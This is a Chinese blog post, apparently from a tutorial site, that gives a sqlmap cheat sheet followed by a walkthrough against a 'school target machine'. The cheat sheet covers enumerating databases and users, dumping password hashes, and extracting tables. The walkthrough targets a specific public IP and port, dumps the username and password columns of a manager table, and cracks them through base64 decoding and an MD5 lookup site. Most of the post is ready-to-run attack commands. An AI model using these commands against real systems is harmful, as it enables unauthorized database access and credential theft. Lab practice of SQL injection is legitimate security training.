sqlmap实战(靶机)

sqlmap攻击学校靶机

sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
python2 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --tamper “base64encode” -v 2 --flush-session --flush-session 清缓存
sqlmap.py -u url 判断
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D ‘表’ 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T ‘表’ --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0

在这里插入图片描述
进入学校网页主页
随机点击
使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username”

遇到选择
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
do you want to use common password suffixes? (slow!) [y/N] y
在这里插入图片描述
CTRL+c 终止
username和password都出来了
看见密码中的等号 想到base64 解密
在这里插入图片描述
再使用MD5解码
https://www.somd5.com/

在这里插入图片描述
得到密码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值